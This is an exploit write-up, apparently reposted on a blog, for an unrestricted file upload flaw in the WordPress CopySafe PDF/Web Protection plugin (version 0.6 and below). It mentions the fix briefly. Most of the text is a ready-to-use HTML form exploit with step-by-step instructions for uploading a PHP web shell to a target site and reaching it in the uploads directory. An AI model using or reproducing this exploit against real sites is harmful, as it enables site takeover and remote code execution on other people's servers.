#Exploit Title : Wordpress Plugin CopySafe PDF Protection Shell Upload vulnerability
#Author : incredible
#Download Link : http://wordpress.artistscope.com/?page_id=39
#version affected : 0.6 and below
#Date : 14/07/2014
#Discovered at : IndiShell Lab
#Credit : Aloulou ( Original Author who first found it & selling it at 20$ at 1337day
) & @error1046##################################################################################################
////////////////////////
/// Overview:
////////////////////////
Wordpress Plugin CopySafe Web Protection (upto version 0.6) suffers from unrestricted file upload vulnerability which allow an attacker to upload malecious php shell on server.
to avaid exploitation , update plugin to version 0.7
///////////////////////////////
// Vulnerability Description:
///////////////////////////////
vulnerability is due to lib/uploadify/uploadify.php file in which there is no check during file upload
attacker need to forward file upload request to this file with PHP shell and file upload path
///////////////////////
/// exploit code ////
///////////////////////
<form action="http://website.com/wp-content/plugins/wp-copysafe-web/lib/uploadify/uploadify.php" method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="wpcsp_file" ><br>
<input type=text name="upload_path" value="../../../../uploads/">
<input type="submit" name="submit" value="Submit">
</form>
change website.com with name of website on which plugin is installed
save this code on you machine as exploit.html
open exploit.html into web browser, brows your php shell and click submit button
shell will be uploaded in uploads directory
http://website.com/wp-content/uploads/shell.php
Nenhum comentário:
Postar um comentário